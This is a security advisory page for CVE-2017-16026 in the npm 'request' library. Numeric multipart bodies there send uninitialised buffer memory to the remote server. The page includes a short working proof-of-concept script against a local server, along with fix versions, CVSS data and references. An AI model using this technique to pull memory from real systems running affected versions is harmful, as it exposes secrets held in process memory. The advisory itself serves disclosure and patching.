Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTd4ZnAtOWM1NS01dnFq
Remote Memory Exposure in request
Affected versions of request will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of body is number, then a buffer of that size will be allocated and sent to the remote server as the body.
Proof of Concept
    var request = require('request'); // an affected version, see the version ranges below
    var http = require('http');

    // Minimal local HTTP server that prints every chunk of request body it receives.
    var serveFunction = function (req, res) {
      req.on('data', function (data) {
        console.log(data);
      });
      res.end();
    };
    var server = http.createServer(serveFunction);
    server.listen(8000);

    // The part body is the number 500 rather than a string or Buffer. On an
    // affected version this allocates a 500-byte buffer and sends its contents
    // as the body, so the server above prints whatever that memory held.
    request({
      method: "POST",
      uri: 'http://localhost:8000',
      multipart: [{ body: 500 }]
    }, function (err, res, body) {
      server.close(); // let the process exit once the request has completed
    });
Recommendation
Update to version 2.68.0 or later
Permalink: https://github.com/advisories/GHSA-7xfp-9c55-5vqj
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTd4ZnAtOWM1NS01dnFq
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 6 years ago
Updated: about 1 year ago
CVSS Score: 5.9
CVSS vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
Identifiers: GHSA-7xfp-9c55-5vqj, CVE-2017-16026
References:
- https://nvd.nist.gov/vuln/detail/CVE-2017-16026
- https://github.com/request/request/issues/1904
- https://github.com/request/request/pull/2018
- https://github.com/request/request/pull/2022
- https://github.com/request/request/commit/29d81814bc16bc79cb112b4face8be6fc00061dd
- https://github.com/advisories/GHSA-7xfp-9c55-5vqj
Blast Radius: 35.0
Affected Packages
npm:request
Dependent packages: 58,231
Dependent repositories: 847,768
Downloads: 73,701,017 last month
Affected Version Ranges: >= 2.2.6, < 2.47.0, >= 2.49.0, < 2.68.0
Fixed in: 2.68.0, 2.68.0
All affected versions: 2.2.6, 2.2.9, 2.9.0, 2.9.1, 2.9.2, 2.9.3, 2.9.100, 2.9.150, 2.9.151, 2.9.152, 2.9.153, 2.9.200, 2.9.201, 2.9.202, 2.9.203, 2.10.0, 2.11.0, 2.11.1, 2.11.2, 2.11.3, 2.11.4, 2.12.0, 2.14.0, 2.16.0, 2.16.2, 2.16.4, 2.16.6, 2.18.0, 2.19.0, 2.20.0, 2.21.0, 2.22.0, 2.23.0, 2.24.0, 2.25.0, 2.26.0, 2.27.0, 2.28.0, 2.29.0, 2.30.0, 2.31.0, 2.32.0, 2.33.0, 2.34.0, 2.35.0, 2.36.0, 2.37.0, 2.38.0, 2.39.0, 2.40.0, 2.41.0, 2.42.0, 2.43.0, 2.44.0, 2.45.0, 2.46.0, 2.49.0, 2.50.0, 2.51.0, 2.52.0, 2.53.0, 2.54.0, 2.55.0, 2.56.0, 2.57.0, 2.58.0, 2.59.0, 2.60.0, 2.61.0, 2.62.0, 2.63.0, 2.64.0, 2.65.0, 2.66.0, 2.67.0
All unaffected versions: 0.8.3, 0.9.0, 0.9.1, 0.9.5, 0.10.0, 1.0.0, 1.1.0, 1.1.1, 1.2.0, 1.9.0, 1.9.1, 1.9.2, 1.9.3, 1.9.5, 1.9.7, 1.9.8, 1.9.9, 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1, 2.2.0, 2.2.5, 2.47.0, 2.48.0, 2.68.0, 2.69.0, 2.70.0, 2.71.0, 2.72.0, 2.73.0, 2.74.0, 2.75.0, 2.76.0, 2.77.0, 2.78.0, 2.79.0, 2.80.0, 2.81.0, 2.82.0, 2.83.0, 2.84.0, 2.85.0, 2.86.0, 2.87.0, 2.88.0, 2.88.2